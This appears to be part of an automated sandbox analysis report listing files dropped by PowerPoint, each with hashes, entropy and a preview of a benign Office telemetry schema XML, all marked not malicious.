                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320032" V="0" DC="SM" EN="Office.Extensibility.DeepLinkingDocumentShowTrustUI" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalExperimentation" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b2d31" />.. </S>.. <C T="I32" I="0" O="false" N="ErrorResult">.. <S T="1" F="ErrorResult" />.. </C>.. <C T="W" I="1" O="true" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <C T="W" I="2" O="true" N="AppInstanceId">.. <S T="1" F="AppInstanceId" />.. </C>.. <C T="B" I="3" O="false" N="ShowDialog">.. <S T="1" F="ShowDialog" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):778
                                                                                                                              Entropy (8bit):5.085567761626465
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5OBnpY9s18nerrSso9dLIAkdy9y1AuH/HO8HynHDtI+NO2su:2dQBWs13rrSncnjfv1AZ
                                                                                                                              MD5:9FCF47F309E430EAB02C368F2121A2D4
                                                                                                                              SHA1:5F4A52512B2E69A57ED458340015D4FF560EF837
                                                                                                                              SHA-256:D2F6F133E5BA591502ACDC75EA73EDE754819D9C9DAA73C2719E77C588B4980B
                                                                                                                              SHA-512:AFB4F40A30AAACD8C181E71F4A3435AA60A3F871AEA913E7E4816F00E79803F914F8961BF1AB44D85DDEAB31B8CFFAB541FE6BD9E202158A757FE0D6A3BBC801
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320033" V="0" DC="SM" EN="Office.Extensibility.DeepLinkingTrustResult" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalExperimentation" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b072l" />.. </S>.. <C T="W" I="0" O="true" N="CorrelationId">.. <S T="1" F="CorrelationId" />.. </C>.. <C T="W" I="1" O="true" N="SolutionId">.. <S T="1" F="SolutionId" />.. </C>.. <C T="W" I="2" O="true" N="AppInstanceId">.. <S T="1" F="AppInstanceId" />.. </C>.. <C T="I32" I="3" O="false" N="DialogCode">.. <S T="1" F="DialogCode" />.. </C>.. <C T="B" I="4" O="false" N="IsAddinTrusted">.. <S T="1" F="IsAddinTrusted" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):589
                                                                                                                              Entropy (8bit):4.876370023266758
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd53bSnpY1nerRer9fSNah03f/HaSMGHhSMNOcsu:2dczr8r9qvf1
                                                                                                                              MD5:DB5CB921C16EF56CD7AB5493BE47CF81
                                                                                                                              SHA1:3C3268C8435FC6B217AADDF39BFB0CF949A42565
                                                                                                                              SHA-256:EE46C02058A8EDB1273FA394B7D18BF95430C510F9477206DB1C44C18B5F6AB4
                                                                                                                              SHA-512:50BE09B346D24F529AE2F1CA1787AA20478CC4934EA750E9E2079C3B964ADF94FFAC3D080E5C5402AADF16BD1C3C82AEA3C89D00125334FD0207606D157EEFD6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320034" V="0" DC="SM" EN="Office.Extensibility.StoreUserStatus" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" S="1" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvti6" />.. <UTS T="2" Id="bvti7" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="U32" I="0" O="false" N="StoreOpen">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="StoreBlocked">.. <C>.. <S T="2" />.. </C>.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1079
                                                                                                                              Entropy (8bit):4.782006038078938
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5PFs0npY1ner8NerzOerMer4erSfzahIffO0iHaSMfACWjHhSMpJN7SHISMg:2dnNzr8Yrzhrzrfr8AbN7657M1Z1P0NJ
                                                                                                                              MD5:C3EF5EA8B7BD495AFADFB0EE100FE76E
                                                                                                                              SHA1:C1BFB1D4D43CB934BF9B32AF6B32E49BAE4E233E
                                                                                                                              SHA-256:E793D30C810061A61FA99E45C6B186CE9765881B7763D8D5C56ADC889775A098
                                                                                                                              SHA-512:1FB1D99D27473A1C1944D5C2B88E27838B5254E27038D855249C04A7055677DC08C69BEDC3EA96BC3CFF8985457BC800ADADB18191C62430862BE54886AB1846
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="320035" V="0" DC="SM" EN="Office.Extensibility.StoreUserStatusError" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" S="1" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bvti5" />.. <UTS T="2" Id="bvti8" />.. <UTS T="3" Id="bvti9" />.. <UTS T="4" Id="bvtja" />.. <UTS T="5" Id="bvtjb" />.. <US T="6">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. </US>.. </S>.. <C T="U32" I="0" O="false" N="ErrorMakingRequest">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="RequestAlreadyInProgress">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="StatusExistsInMemoryCache">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="StatusExistsInRegistryCache">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U32" I="4" O="false" N="GetCurrentUserError">.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):666
                                                                                                                              Entropy (8bit):4.984519219711497
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5AlPnpYxnerbOSermSNah6ued+MTtigDNNOgD5NOcsu:2dKBNrbOFrxHmyQI
                                                                                                                              MD5:2E5E7D02F4D8C8BAF56ED2D53A1F66EC
                                                                                                                              SHA1:A4074058CBFE5CB11F5DB62FA277CB4AE7EED0AC
                                                                                                                              SHA-256:F4478FC721DED66AB01BB26F418643D2DABD1DE0E6ED307897565037126DF60F
                                                                                                                              SHA-512:474448A6935EA6FFBCEF71F1779F4EB2C5B604F2D40D877A4303AE966FE2FF986A11D60E8B89839F470DE7787A2712EDC209962ECC5C4CEAE2F21DC641900AE0
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="322001" V="0" DC="SM" EN="Office.Extensibility.COMAddinCount" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" S="10" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="aw54n" />.. <UTS T="2" Id="aymsa" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="3" F="ULS_TagId" />.. </C>.. <C T="I32" I="1" O="true" N="ScopeId">.. <S T="3" F="ScopeId" />.. </C>.. <C T="I32" I="2" O="false" N="TotalInstalledAddins">.. <S T="3" F="TotalInstalledAddins" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1358
                                                                                                                              Entropy (8bit):4.90876199662902
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dBv7nDr4kV4Z79m+Un1heA+U+e5w1DYWn:cxnEjUEYWn
                                                                                                                              MD5:BA2EF567B40F841F19823EAC65DF0154
                                                                                                                              SHA1:8EEC3B07C10A11CBC0C323B0DD734371A17DD87D
                                                                                                                              SHA-256:F2A494C577362D0DC5E9AD1EAEA54D932D2DCD8E8C32DA72D4C17D9147D77E26
                                                                                                                              SHA-512:21A9CCE205C2A8EC9D79AEA5F148220E46D8A81E4C7C8D086E8E3A4BD5C9D0B3183892525A08F4F59F40EB57F2F9C96BC511CD5FD602715077B40A78F6B54F90
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="322006" V="5" DC="SM" EN="Office.Extensibility.COMAddinUnhandledException" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalUsage" DL="B" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bumpa" />.. </S>.. <C T="I32" I="0" O="true" N="ScopeId">.. <S T="1" F="ScopeId" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="Method">.. <S T="1" F="Method" />.. </C>.. <C T="W" I="2" O="true" N="Interface">.. <S T="1" F="Interface" />.. </C>.. <C T="G" I="3" O="true" N="AddinId">.. <S T="1" F="AddinId" />.. </C>.. <C T="W" I="4" O="true" N="AddinProgId">.. <V V="" T="W" />.. </C>.. <C T="W" I="5" O="true" N="AddinFriendlyName">.. <V V="" T="W" />.. </C>.. <C T="W" I="6" O="true" N="AddinTimeDateStamp">.. <S T="1" F="AddinTimeDateStamp" M="Ignore" />.. </C>.. <C T="W" I="7" O="true" N="AddinVersion">.. <V V="" T="W" />.. </C>.. <C T="W" I="8" O="true" N="AddinFi
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):512
                                                                                                                              Entropy (8bit):5.28524267291355
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5hLtrnpYoAQ8nerO8AuUdaGodHMNO2su:2dnLtrrrOHfpUE
                                                                                                                              MD5:2CE84E69AD7CA20EFECB3C28083C68D2
                                                                                                                              SHA1:55099B8F89ECA5093FA46DA94F9DF28629AD641A
                                                                                                                              SHA-256:D32C82062A5B8CDD83D648B1BE72AA9F4DB33EFB025533E5ED8DC99E4C363294
                                                                                                                              SHA-512:E359B4081FF077C55932944470B786E7D94444709B6F95CF3A3C6F4AA6CD757C2BAE636EDC7B9225957FCE2EDA1F9B33E34BD510B968B0AA478DABE0AC000280
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324001" V="4" DC="SM" EN="Office.Extensibility.VbaTelemetryProjectLoad" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097w" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):512
                                                                                                                              Entropy (8bit):5.287539366754239
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5ftrnpYoAQ8nerzuUdaGodHMNO2su:2ddtrrrzfpUE
                                                                                                                              MD5:964C3805D16D78CEDC1C55B5492EC7C3
                                                                                                                              SHA1:351842336C705E6FBA8F609CE426A12BD5EB6D6B
                                                                                                                              SHA-256:F43CFBBDD523A9D826E154CA5487FCACA11EE3634E9F1E86E3F202B17B6C6AE5
                                                                                                                              SHA-512:E075F4FA13694153E45674A6B033D83E3972B8B7E8054045A425C4E72F8DB1B8A379B7CEEBEFFBF19AE65ABC519A441FF75345D0122B167F5BF53675631EDE47
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324001" V="6" DC="SM" EN="Office.Extensibility.VbaTelemetryProjectLoad" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q82c" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):832
                                                                                                                              Entropy (8bit):5.072286939466072
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd55hZOnpYunerOYuUdaGodHMp9SufJSx4moXDsnHDhFIyF3wX2MNO2su:2dhZO6rOYfpUWw9oTeVBA9
                                                                                                                              MD5:C0F6D8DA413212E953D8DB8A8B881DB5
                                                                                                                              SHA1:F008D8DCE7F2976C3FCA5ACD4415ACE2FDD318CC
                                                                                                                              SHA-256:7B5A8BB6C965C1F6491B0A40EAEA4A88F053A63B06BA7210E93996CAF0BD5A42
                                                                                                                              SHA-512:B40C4613D3D086FB67A7BEF5A0855F656220F82BFBB59966EAAF1D948F0BC4B39488A1F2B7838B955FAC2B86789F6FBEFB3E159900A73C0880AD0D8F68994047
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324002" V="5" DC="SM" EN="Office.Extensibility.VbaTelemetryDeclare" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097x" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="true" N="HashDeclare">.. <S T="1" F="HashDeclare" />.. </C>.. <C T="U32" I="3" O="true" N="HashEntryPoint">.. <S T="1" F="HashEntryPoint" />.. </C>.. <C T="B" I="4" O="false" N="IsPtrSafe">.. <S T="1" F="IsPtrSafe" />.. </C>.. <C T="U32" I="5" O="false" N="DeclareCount">.. <S T="1" F="DeclareCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):715
                                                                                                                              Entropy (8bit):5.184670233151106
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5u/tetnpYunerOp7uUdaGodHMp9VJYGJ9yVeacX6eabMNO2su:2d8ct6rOp7fpU059/1vd
                                                                                                                              MD5:95D12138147F2727AB403314A7E280CD
                                                                                                                              SHA1:7B63AAB9196EB9929D6A4D39C2A12A18E6F0B1B2
                                                                                                                              SHA-256:C3EA59AD5973D08C628EFCF617F433B8EEB10612981FB9E2F4E48FDF1840CA0F
                                                                                                                              SHA-512:B1E0C4EA0A806AF2A2FABFB36E2E3327AED29CB3B0A11CEEE2FAACE6E2EE08227C494FECE776051BE0BA15D92B96DD30531330E973BC428E99C8059C7F1B3A0E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324003" V="5" DC="SM" EN="Office.Extensibility.VbaTelemetryReferencedLibrary" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097y" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="true" N="HashReferenceLibraryClsid">.. <S T="1" F="HashReferenceLibraryClsid" />.. </C>.. <C T="U32" I="3" O="false" N="ReferencedLibraryCount">.. <S T="1" F="ReferencedLibraryCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):737
                                                                                                                              Entropy (8bit):5.19037429827684
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5CLDDUhnpYunerOquUdaGodHMp9VEIpyXOXclMNO2su:2dwLsh6rOqfpUKF9
                                                                                                                              MD5:3923DD89B8F7A269F8A2AE3354135DED
                                                                                                                              SHA1:137E79F5BEB0E7C5D76E43CB0B23675AC364484B
                                                                                                                              SHA-256:2E1F5A5200B3768068FABED90872A2F5041DA2C8EA4CFE77562838ECAFE185CA
                                                                                                                              SHA-512:3B5A524F7FA9F26DD3F3E31D30EFE65053DC3709926D700BC3FB23BEFD75A9F04F169FD9B76D4FF10F71B52D9757641DF0F0E0263C58C73CC9AB08B40F393A9C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324004" V="4" DC="SM" EN="Office.Extensibility.VbaTelemetryComObjectInstantiated" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b097z" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="true" N="HashComObjectInstantiatedClsid">.. <S T="1" F="HashComObjectInstantiatedClsid" />.. </C>.. <C T="U32" I="3" O="false" N="ComObjectInstantiatedCount">.. <S T="1" F="ComObjectInstantiatedCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):598
                                                                                                                              Entropy (8bit):5.220281387352167
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5/D+enpYoAQ8nerOVHSuUdaGodHMpEXBMNO2su:2dNVrrOVyfpUTO
                                                                                                                              MD5:287285B9E2B8820FB86A37D74E649660
                                                                                                                              SHA1:DD21BC330684051BFF800B42E8708C612ACB75C3
                                                                                                                              SHA-256:C438EFFD03017C328827A7B531D96B4636AF786C5F6D82A1FB10CE4E34CA2662
                                                                                                                              SHA-512:695E749D9DA76A7252C200C5683184AA137A67D53534FCEC7AB2D445B6373546E820F9769899749BF19BF720DFCAC184E9E932AF834E3EA362642793261535DA
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324005" V="2" DC="SM" EN="Office.Extensibility.VbaTelemetryCompile" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0970" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="CompileCount">.. <S T="1" F="CompileCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):598
                                                                                                                              Entropy (8bit):5.228447488495804
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5QzD+enpYoAQ8nerFAuUdaGodHMpEXBMNO2su:2dOzVrrFAfpUTO
                                                                                                                              MD5:1EDCE6C7EAA57D9E6C0D42D389425C05
                                                                                                                              SHA1:CB90BDF2DA5BD1A5A2D1413F572A25B2A1D7FD0A
                                                                                                                              SHA-256:D2C96D3C5BC09610B161BA6DB0CF5B6F6E3185B00EFF92BE58FBF6A3FB80833F
                                                                                                                              SHA-512:95890662C772B1F732280DA982B1CD90913E12BDCDCB057F36AE0A471E69BB0BFF59A031E3CAA1E7128251743EE0C200973CC2876562B37E8BB8DED613AB8178
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324005" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryCompile" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q82b" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="CompileCount">.. <S T="1" F="CompileCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):598
                                                                                                                              Entropy (8bit):5.230232099526286
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd59gvoTxsnpYoAQ8nerOZuUdaGodHMpeXnMNO2su:2djSsxsrrOZfpUVU
                                                                                                                              MD5:3371879654E44CB5D0393BA7850A2166
                                                                                                                              SHA1:C1D83EE7B166EDA7D6FA7C8E0DB60943EDC65D95
                                                                                                                              SHA-256:7A04AE00313C15E23692294D632B2229170DF1C63D352D0220399B5F3201E362
                                                                                                                              SHA-512:3666C70849BC7139DD97675B274704C7214C3D8C23E4482D1954B8E56E18FFB22912D11141F3B43E54DA5FB51264F2BB72072DA0CA7FB756274B52E54D7FDA73
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324006" V="2" DC="SM" EN="Office.Extensibility.VbaTelemetryShowIde" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0971" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="ShowIdeCount">.. <S T="1" F="ShowIdeCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):598
                                                                                                                              Entropy (8bit):5.237526852680604
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd59gAzoTxsnpYoAQ8ner9PuUdaGodHMpeXnMNO2su:2djvzsxsrrJfpUVU
                                                                                                                              MD5:06DEA329F8818F96CBCE9D5EA2A3B967
                                                                                                                              SHA1:4CEFD1BAA9B3FEC29926B7FE9F16FB8698E207AC
                                                                                                                              SHA-256:F2BE02547A7895A1FCF762140AEE3F3600C1AC82C659D1377FB54BBFABDF7DE8
                                                                                                                              SHA-512:6DCBED72C204DDFC424B8B288873667F7BB38B9B8AF80177E463A39AF4FCFC58E3136F298B3F50DCF21FC02073734D09D4102852F4F6A0D04F2C532F806C82EB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324006" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryShowIde" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q82a" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="ShowIdeCount">.. <S T="1" F="ShowIdeCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):610
                                                                                                                              Entropy (8bit):5.241176697150625
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5ZZkEnpYoAQ8nerOiuUdaGodHMpfBrOXIMrlMNO2su:2dDZfrrOifpU+pOHC
                                                                                                                              MD5:FB3E07DB165CBB21591A0410958E9FE7
                                                                                                                              SHA1:C13161F39DE0E7678417E21A3BC238EF225E61B9
                                                                                                                              SHA-256:D0B3098BA4AFE1D8E083C87AEA82CF519D0A285133A2230BDE27C6C676EF9E85
                                                                                                                              SHA-512:79754DD8A94D2205C469AC7F7546D00A2C821E4C5DDF2909320E710812687380069E6E89248E0E66AD44391FDA71D62E0D32F2F51EC6A9135DF5B354AA3012D8
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324007" V="2" DC="SM" EN="Office.Extensibility.VbaTelemetryIdeMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0972" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="IdeMacroRunCount">.. <S T="1" F="IdeMacroRunCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):610
                                                                                                                              Entropy (8bit):5.251418148678797
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5CzZkEnpYoAQ8nertSuUdaGodHMpfBrOXIMrlMNO2su:2dczZfrrQfpU+pOHC
                                                                                                                              MD5:A386F258CA22FC61F09EE11A92F22110
                                                                                                                              SHA1:499473D3793D50D8F03398948999CA20AA648A7E
                                                                                                                              SHA-256:EA41D74B13EDA083BBC0C7DD8591F7F960C94ED1CC6CBCEE93B97CF919598251
                                                                                                                              SHA-512:3A945C2B28A1B4F8F0D219507EB0D707896E70CEAF9C391FBB1A0FC84EEBE2A30152DD8E3B587C852710BCD067A755CF51293D0E9B855207EC9F5685614777B5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="324007" V="3" DC="SM" EN="Office.Extensibility.VbaTelemetryIdeMacroRun" ATT="db334b301e7b474db5e0f02f07c51a47-a1b5bc36-1bbe-482f-a64a-c2d9cb606706-7439" SP="CriticalBusinessImpact" DCa="DC PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="4q819" />.. </S>.. <C T="W" I="0" O="false" N="TagId">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="U32" I="1" O="true" N="HashProjectName">.. <S T="1" F="HashProjectName" />.. </C>.. <C T="U32" I="2" O="false" N="IdeMacroRunCount">.. <S T="1" F="IdeMacroRunCount" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):606
